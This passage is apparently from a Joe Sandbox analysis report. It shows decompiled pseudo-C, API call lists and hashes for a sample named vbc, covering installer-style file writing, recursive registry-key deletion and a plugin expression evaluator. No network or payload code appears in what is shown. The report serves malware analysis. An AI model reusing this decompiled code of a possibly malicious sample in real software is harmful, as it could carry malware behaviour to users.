                    					if(_t27 != 0) {
                    						if(_t27 != 0xffffffff) {
                    							if(_t27 > 0) {
                    								E734F1381(_t27 - 1, _t40);
                    								goto L26;
                    							}
                    						} else {
                    							E734F1312(_t40);
                    							L26:
                    						}
                    					}
                    					_t44 = _t44 - 1;
                    					_t43 = _t43 - 0x20;
                    				} while (_t44 >= 0);
                    				return GlobalFree(_t40);
                    			}

                    APIs
                      • Part of subcall function 734F12BB: GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5
                    • GlobalFree.KERNEL32(?), ref: 734F2743
                    • GlobalFree.KERNEL32(00000000), ref: 734F2778
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$Alloc
                    • String ID:
                    • API String ID: 1780285237-0
                    • Opcode ID: 67e428c09d0736c4ddb173c34d18a591b72c0ecb6a2e3c3b6a7bf603a76ea03c
                    • Instruction ID: d3a529518b3a09acee0658c5e45db5b2eba8755f844ca550f4f525dd77c009b3
                    • Opcode Fuzzy Hash: 67e428c09d0736c4ddb173c34d18a591b72c0ecb6a2e3c3b6a7bf603a76ea03c
                    • Instruction Fuzzy Hash: 8B31027A10810BEFD71EAF95C884F2A7BFAFB8530472C412CF105A32A0CB315825CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00402950(int __ebx, void* __eflags) {
                    				WCHAR* _t26;
                    				void* _t29;
                    				long _t37;
                    				int _t49;
                    				void* _t52;
                    				void* _t54;
                    				void* _t56;
                    				void* _t59;
                    				void* _t60;
                    				void* _t61;
                    
                    				_t49 = __ebx;
                    				_t52 = 0xfffffd66;
                    				_t26 = E00402DA6(0xfffffff0);
                    				_t55 = _t26;
                    				 *(_t61 - 0x40) = _t26;
                    				if(E00405E60(_t26) == 0) {
                    					E00402DA6(0xffffffed);
                    				}
                    				E00405FE5(_t55);
                    				_t29 = E0040600A(_t55, 0x40000000, 2);
                    				 *(_t61 + 8) = _t29;
                    				if(_t29 != 0xffffffff) {
                    					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                    					if( *(_t61 - 0x28) != _t49) {
                    						_t37 =  *0x7a8a74;
                    						 *(_t61 - 0x44) = _t37;
                    						_t54 = GlobalAlloc(0x40, _t37);
                    						if(_t54 != _t49) {
                    							E004034C2(_t49);
                    							E004034AC(_t54,  *(_t61 - 0x44));
                    							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                    							 *(_t61 - 0x10) = _t59;
                    							if(_t59 != _t49) {
                    								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                    								while( *_t59 != _t49) {
                    									_t60 = _t59 + 8;
                    									 *(_t61 - 0x3c) =  *_t59;
                    									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                    									_t59 = _t60 +  *(_t61 - 0x3c);
                    								}
                    								GlobalFree( *(_t61 - 0x10));
                    							}
                    							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                    							GlobalFree(_t54);
                    							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                    						}
                    					}
                    					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                    					CloseHandle( *(_t61 + 8));
                    				}
                    				_t56 = 0xfffffff3;
                    				if(_t52 < _t49) {
                    					_t56 = 0xffffffef;
                    					DeleteFileW( *(_t61 - 0x40));
                    					 *((intOrPtr*)(_t61 - 4)) = 1;
                    				}
                    				_push(_t56);
                    				E00401423();
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
                    				return 0;
                    			}

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                    • GlobalFree.KERNEL32(?), ref: 00402A06
                    • GlobalFree.KERNEL32(00000000), ref: 00402A19
                    • CloseHandle.KERNEL32(?), ref: 00402A35
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                    • String ID:
                    • API String ID: 2667972263-0
                    • Opcode ID: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
                    • Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
                    • Opcode Fuzzy Hash: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
                    • Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E734F1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                    				void* _v8;
                    				signed int _v12;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v76;
                    				void _t45;
                    				signed int _t46;
                    				signed int _t47;
                    				signed int _t48;
                    				signed int _t57;
                    				signed int _t58;
                    				signed int _t59;
                    				signed int _t60;
                    				signed int _t61;
                    				void* _t67;
                    				void* _t68;
                    				void* _t69;
                    				void* _t70;
                    				void* _t71;
                    				signed int _t77;
                    				void* _t81;
                    				signed int _t83;
                    				signed int _t85;
                    				signed int _t87;
                    				signed int _t90;
                    				void* _t101;
                    
                    				_t85 = __edx;
                    				 *0x734f506c = _a8;
                    				_t77 = 0;
                    				 *0x734f5070 = _a16;
                    				_v12 = 0;
                    				_v8 = E734F12E3();
                    				_t90 = E734F13B1(_t42);
                    				_t87 = _t85;
                    				_t81 = E734F12E3();
                    				_a8 = _t81;
                    				_t45 =  *_t81;
                    				if(_t45 != 0x7e && _t45 != 0x21) {
                    					_a16 = E734F12E3();
                    					_t77 = E734F13B1(_t74);
                    					_v12 = _t85;
                    					GlobalFree(_a16);
                    					_t81 = _a8;
                    				}
                    				_t46 =  *_t81 & 0x0000ffff;
                    				_t101 = _t46 - 0x2f;
                    				if(_t101 > 0) {
                    					_t47 = _t46 - 0x3c;
                    					__eflags = _t47;
                    					if(_t47 == 0) {
                    						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                    						if( *((short*)(_t81 + 2)) != 0x3c) {
                    							__eflags = _t87 - _v12;
                    							if(__eflags > 0) {
                    								L56:
                    								_t48 = 0;
                    								__eflags = 0;
                    								L57:
                    								asm("cdq");
                    								L58:
                    								_t90 = _t48;
                    								_t87 = _t85;
                    								L59:
                    								E734F1510(_t85, _t90, _t87,  &_v76);
                    								E734F1312( &_v76);
                    								GlobalFree(_v8);
                    								return GlobalFree(_a8);
                    							}
                    							if(__eflags < 0) {
                    								L49:
                    								__eflags = 0;
                    								L50:
                    								_t48 = 1;
                    								goto L57;
                    							}
                    							__eflags = _t90 - _t77;
                    							if(_t90 < _t77) {
                    								goto L49;
                    							}
                    							goto L56;
                    						}
                    						_t85 = _t87;
                    						_t48 = E734F3050(_t90, _t77, _t85);
                    						goto L58;
                    					}
                    					_t57 = _t47 - 1;
                    					__eflags = _t57;
                    					if(_t57 == 0) {
                    						__eflags = _t90 - _t77;
                    						if(_t90 != _t77) {
                    							goto L56;
                    						}
                    						__eflags = _t87 - _v12;
                    						if(_t87 != _v12) {
                    							goto L56;
                    						}
                    						goto L49;
                    					}
                    					_t58 = _t57 - 1;
                    					__eflags = _t58;
                    					if(_t58 == 0) {
                    						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                    						if( *((short*)(_t81 + 2)) != 0x3e) {
                    							__eflags = _t87 - _v12;
                    							if(__eflags < 0) {
                    								goto L56;
                    							}
                    							if(__eflags > 0) {
                    								goto L49;
                    							}
                    							__eflags = _t90 - _t77;
                    							if(_t90 <= _t77) {
                    								goto L56;
                    							}
                    							goto L49;
                    						}
                    						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                    						_t85 = _t87;
                    						_t59 = _t90;
                    						_t83 = _t77;
                    						if( *((short*)(_t81 + 4)) != 0x3e) {
                    							_t48 = E734F3070(_t59, _t83, _t85);
                    						} else {
                    							_t48 = E734F30A0(_t59, _t83, _t85);
                    						}
                    						goto L58;
                    					}
                    					_t60 = _t58 - 0x20;
                    					__eflags = _t60;
                    					if(_t60 == 0) {
                    						_t90 = _t90 ^ _t77;
                    						_t87 = _t87 ^ _v12;
                    						goto L59;
                    					}
                    					_t61 = _t60 - 0x1e;
                    					__eflags = _t61;
                    					if(_t61 == 0) {
                    						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                    						if( *((short*)(_t81 + 2)) != 0x7c) {
                    							_t90 = _t90 | _t77;
                    							_t87 = _t87 | _v12;
                    							goto L59;
                    						}
                    						__eflags = _t90 | _t87;
                    						if((_t90 | _t87) != 0) {
                    							goto L49;
                    						}
                    						__eflags = _t77 | _v12;
                    						if((_t77 | _v12) != 0) {
                    							goto L49;
                    						}
                    						goto L56;
                    					}
                    					__eflags = _t61 == 0;
                    					if(_t61 == 0) {
                    						_t90 =  !_t90;
                    						_t87 =  !_t87;
                    					}
                    					goto L59;
                    				}
                    				if(_t101 == 0) {
                    					L21:
                    					__eflags = _t77 | _v12;
                    					if((_t77 | _v12) != 0) {
                    						_v24 = E734F2EE0(_t90, _t87, _t77, _v12);
                    						_v20 = _t85;
                    						_t48 = E734F2F90(_t90, _t87, _t77, _v12);
                    						_t81 = _a8;
                    					} else {
                    						_v24 = _v24 & 0x00000000;
                    						_v20 = _v20 & 0x00000000;
                    						_t48 = _t90;
                    						_t85 = _t87;
                    					}
                    					__eflags =  *_t81 - 0x2f;
                    					if( *_t81 != 0x2f) {
                    						goto L58;
                    					} else {
                    						_t90 = _v24;
                    						_t87 = _v20;
                    						goto L59;
                    					}
                    				}
                    				_t67 = _t46 - 0x21;
                    				if(_t67 == 0) {
                    					_t48 = 0;
                    					__eflags = _t90 | _t87;
                    					if((_t90 | _t87) != 0) {
                    						goto L57;
                    					}
                    					goto L50;
                    				}
                    				_t68 = _t67 - 4;
                    				if(_t68 == 0) {
                    					goto L21;
                    				}
                    				_t69 = _t68 - 1;
                    				if(_t69 == 0) {
                    					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                    					if( *((short*)(_t81 + 2)) != 0x26) {
                    						_t90 = _t90 & _t77;
                    						_t87 = _t87 & _v12;
                    						goto L59;
                    					}
                    					__eflags = _t90 | _t87;
                    					if((_t90 | _t87) == 0) {
                    						goto L56;
                    					}
                    					__eflags = _t77 | _v12;
                    					if((_t77 | _v12) == 0) {
                    						goto L56;
                    					}
                    					goto L49;
                    				}
                    				_t70 = _t69 - 4;
                    				if(_t70 == 0) {
                    					_t48 = E734F2EA0(_t90, _t87, _t77, _v12);
                    					goto L58;
                    				} else {
                    					_t71 = _t70 - 1;
                    					if(_t71 == 0) {
                    						_t90 = _t90 + _t77;
                    						asm("adc edi, [ebp-0x8]");
                    					} else {
                    						if(_t71 == 0) {
                    							_t90 = _t90 - _t77;
                    							asm("sbb edi, [ebp-0x8]");
                    						}
                    					}
                    					goto L59;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: FreeGlobal
                    • String ID:
                    • API String ID: 2979337801-0
                    • Opcode ID: 458411f21683857108a84a060a8649dd7260fcb6d5c44e6e4cbbd4275c944797
                    • Instruction ID: 60d2fd4845723886afd4f31c48d11e59c5924cc4ad5ba204a4508bec8e1fb10b
                    • Opcode Fuzzy Hash: 458411f21683857108a84a060a8649dd7260fcb6d5c44e6e4cbbd4275c944797
                    • Instruction Fuzzy Hash: 7551C432D0011BEFDB0E9FA4848079E7BBAEB44314F1D415ED417B3398E671A946879D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E734F2480(void* __edx) {
                    				void* _t37;
                    				signed int _t38;
                    				void* _t39;
                    				void* _t41;
                    				signed char* _t42;
                    				signed char* _t51;
                    				void* _t52;
                    				void* _t54;
                    
                    				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                    				while(1) {
                    					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                    					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                    					_t52 = _t51[0x18];
                    					if(_t52 == 0) {
                    						goto L9;
                    					}
                    					_t41 = 0x1a;
                    					if(_t52 == _t41) {
                    						goto L9;
                    					}
                    					if(_t52 != 0xffffffff) {
                    						if(_t52 <= 0 || _t52 > 0x19) {
                    							_t51[0x18] = _t41;
                    							goto L12;
                    						} else {
                    							_t37 = E734F135A(_t52 - 1);
                    							L10:
                    							goto L11;
                    						}
                    					} else {
                    						_t37 = E734F12E3();
                    						L11:
                    						_t52 = _t37;
                    						L12:
                    						_t13 =  &(_t51[8]); // 0x1020
                    						_t42 = _t13;
                    						if(_t51[4] >= 0) {
                    						}
                    						_t38 =  *_t51 & 0x000000ff;
                    						_t51[0x1c] = 0;
                    						if(_t38 > 7) {
                    							L27:
                    							_t39 = GlobalFree(_t52);
                    							if( *(_t54 + 0x10) == 0) {
                    								return _t39;
                    							}
                    							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                    								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                    							} else {
                    								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                    							}
                    							continue;
                    						} else {
                    							switch( *((intOrPtr*)(_t38 * 4 +  &M734F25F8))) {
                    								case 0:
                    									 *_t42 = 0;
                    									goto L27;
                    								case 1:
                    									__eax = E734F13B1(__ebp);
                    									goto L21;
                    								case 2:
                    									 *__edi = E734F13B1(__ebp);
                    									__edi[1] = __edx;
                    									goto L27;
                    								case 3:
                    									__eax = GlobalAlloc(0x40,  *0x734f506c);
                    									 *(__esi + 0x1c) = __eax;
                    									__edx = 0;
                    									 *__edi = __eax;
                    									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x734f506c, __eax,  *0x734f506c, 0, 0);
                    									goto L27;
                    								case 4:
                    									__eax = E734F12CC(__ebp);
                    									 *(__esi + 0x1c) = __eax;
                    									L21:
                    									 *__edi = __eax;
                    									goto L27;
                    								case 5:
                    									__eax = GlobalAlloc(0x40, 0x10);
                    									_push(__eax);
                    									 *(__esi + 0x1c) = __eax;
                    									_push(__ebp);
                    									 *__edi = __eax;
                    									__imp__CLSIDFromString();
                    									goto L27;
                    								case 6:
                    									if( *__ebp != __cx) {
                    										__eax = E734F13B1(__ebp);
                    										 *__ebx = __eax;
                    									}
                    									goto L27;
                    								case 7:
                    									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                    									( *(__esi + 0x18) - 1) *  *0x734f506c =  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18;
                    									 *__ebx =  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18;
                    									asm("cdq");
                    									__eax = E734F1510(__edx,  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18, __edx,  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2);
                    									goto L27;
                    							}
                    						}
                    					}
                    					L9:
                    					_t37 = E734F12CC(0x734f5044);
                    					goto L10;
                    				}
                    			}

                    0x734f2494
                    0x734f2498
                    0x734f24a3
                    0x734f24a3
                    0x734f24aa
                    0x734f24af
                    0x00000000
                    0x00000000
                    0x734f24b3
                    0x734f24b6
                    0x00000000
                    0x00000000
                    0x734f24bb
                    0x734f24c6
                    0x734f24d6
                    0x00000000
                    0x734f24cd
                    0x734f24cf
                    0x734f24e5
                    0x00000000
                    0x734f24e5
                    0x734f24bd
                    0x734f24bd
                    0x734f24e6
                    0x734f24e6
                    0x734f24e8
                    0x734f24ec
                    0x734f24ec
                    0x734f24ef
                    0x734f24ef
                    0x734f24f7
                    0x734f24ff
                    0x734f2502
                    0x734f25c1
                    0x734f25c2
                    0x734f25cd
                    0x734f25f7
                    0x734f25f7
                    0x734f25dd
                    0x734f25e9
                    0x734f25df
                    0x734f25df
                    0x734f25df
                    0x00000000
                    0x734f2508
                    0x734f2508
                    0x00000000
                    0x734f250f
                    0x00000000
                    0x00000000
                    0x734f2517
                    0x00000000
                    0x00000000
                    0x734f2525
                    0x734f2527
                    0x00000000
                    0x00000000
                    0x734f2548
                    0x734f254e
                    0x734f2551
                    0x734f2553
                    0x734f2563
                    0x00000000
                    0x00000000
                    0x734f2530
                    0x734f2535
                    0x734f2538
                    0x734f2539
                    0x00000000
                    0x00000000
                    0x734f256f
                    0x734f2575
                    0x734f2576
                    0x734f2579
                    0x734f257a
                    0x734f257c
                    0x00000000
                    0x00000000
                    0x734f2588
                    0x734f258b
                    0x734f2597
                    0x734f2599
                    0x00000000
                    0x00000000
                    0x734f25a5
                    0x734f25b1
                    0x734f25b4
                    0x734f25b6
                    0x734f25b9
                    0x00000000
                    0x00000000
                    0x734f2508
                    0x734f2502
                    0x734f24db
                    0x734f24e0
                    0x00000000
                    0x734f24e0

                    APIs
                    • GlobalFree.KERNEL32(00000000), ref: 734F25C2
                      • Part of subcall function 734F12CC: lstrcpynW.KERNEL32(00000000,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12DC
                    • GlobalAlloc.KERNEL32(00000040), ref: 734F2548
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 734F2563
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                    • String ID:
                    • API String ID: 4216380887-0
                    • Opcode ID: 48c3d64306c49c2946d6aa7ebe053043f8ae2c5aad39ea6ad2126c187571ac00
                    • Instruction ID: b86d4a62d0bede8048e85a752c99c46de153c9a5163161af9ff9b64bfe6262a6
                    • Opcode Fuzzy Hash: 48c3d64306c49c2946d6aa7ebe053043f8ae2c5aad39ea6ad2126c187571ac00
                    • Instruction Fuzzy Hash: E641BEB900870BEFE75CEF25D840B2677F8FB44310F1C891DE45A96681EB70A545CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                    				void* _v8;
                    				int _v12;
                    				short _v536;
                    				void* _t27;
                    				signed int _t33;
                    				intOrPtr* _t35;
                    				signed int _t45;
                    				signed int _t46;
                    				signed int _t47;
                    
                    				_t46 = _a12;
                    				_t47 = _t46 & 0x00000300;
                    				_t45 = _t46 & 0x00000001;
                    				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                    				if(_t27 == 0) {
                    					if((_a12 & 0x00000002) == 0) {
                    						L3:
                    						_push(0x105);
                    						_push( &_v536);
                    						_push(0);
                    						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                    							__eflags = _t45;
                    							if(__eflags != 0) {
                    								L10:
                    								RegCloseKey(_v8);
                    								return 0x3eb;
                    							}
                    							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                    							__eflags = _t33;
                    							if(_t33 != 0) {
                    								break;
                    							}
                    							_push(0x105);
                    							_push( &_v536);
                    							_push(_t45);
                    						}
                    						RegCloseKey(_v8);
                    						_t35 = E004068E7(3);
                    						if(_t35 != 0) {
                    							return  *_t35(_a4, _a8, _t47, 0);
                    						}
                    						return RegDeleteKeyW(_a4, _a8);
                    					}
                    					_v12 = 0;
                    					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                    						goto L10;
                    					}
                    					goto L3;
                    				}
                    				return _t27;
                    			}

                    0x00402eb4
                    0x00402ebd
                    0x00402ec6
                    0x00402ed2
                    0x00402edb
                    0x00402ee5
                    0x00402f0a
                    0x00402f10
                    0x00402f15
                    0x00402f16
                    0x00402f46
                    0x00402f1f
                    0x00402f21
                    0x00402f71
                    0x00402f74
                    0x00000000
                    0x00402f7a
                    0x00402f30
                    0x00402f35
                    0x00402f37
                    0x00000000
                    0x00000000
                    0x00402f3f
                    0x00402f44
                    0x00402f45
                    0x00402f45
                    0x00402f52
                    0x00402f5a
                    0x00402f61
                    0x00000000
                    0x00402f8a
                    0x00000000
                    0x00402f69
                    0x00402ef5
                    0x00402f08
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402f08
                    0x00402f90

                    APIs
                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                    • RegCloseKey.ADVAPI32(?), ref: 00402F52
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                    • RegCloseKey.ADVAPI32(?), ref: 00402F74
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CloseEnum$DeleteValue
                    • String ID:
                    • API String ID: 1354259210-0
                    • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                    • Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
                    • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                    • Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00401D81(void* __ebx, void* __edx) {
                    				struct HWND__* _t30;
                    				WCHAR* _t38;
                    				void* _t48;
                    				void* _t53;
                    				signed int _t55;
                    				signed int _t60;
                    				long _t63;
                    				void* _t65;
                    
                    				_t53 = __ebx;
                    				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                    				} else {
                    					E00402D84(2);
                    					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                    				}
                    				_t55 =  *(_t65 - 0x24);
                    				 *(_t65 + 8) = _t30;
                    				_t60 = _t55 & 0x00000004;
                    				 *(_t65 - 0x38) = _t55 & 0x00000003;
                    				 *(_t65 - 0x18) = _t55 >> 0x1f;
                    				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                    				if((_t55 & 0x00010000) == 0) {
                    					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                    				} else {
                    					_t38 = E00402DA6(0x11);
                    				}
                    				 *(_t65 - 0x44) = _t38;
                    				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                    				asm("sbb esi, esi");
                    				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                    				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                    				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                    					DeleteObject(_t48);
                    				}
                    				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                    					_push(_t63);
                    					E00406461();
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
                    				return 0;
                    			}

                    0x00401d81
                    0x00401d85
                    0x00401d9a
                    0x00401d87
                    0x00401d89
                    0x00401d8f
                    0x00401d8f
                    0x00401da0
                    0x00401da3
                    0x00401dad
                    0x00401db0
                    0x00401db8
                    0x00401dc9
                    0x00401dcc
                    0x00401dd7
                    0x00401dce
                    0x00401dd0
                    0x00401dd0
                    0x00401ddb
                    0x00401de5
                    0x00401e0c
                    0x00401e1b
                    0x00401e29
                    0x00401e31
                    0x00401e39
                    0x00401e39
                    0x00401e42
                    0x00401e48
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GetDlgItem.USER32(?,?), ref: 00401D9A
                    • GetClientRect.USER32 ref: 00401DE5
                    • LoadImageW.USER32 ref: 00401E15
                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                    • DeleteObject.GDI32(00000000), ref: 00401E39
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
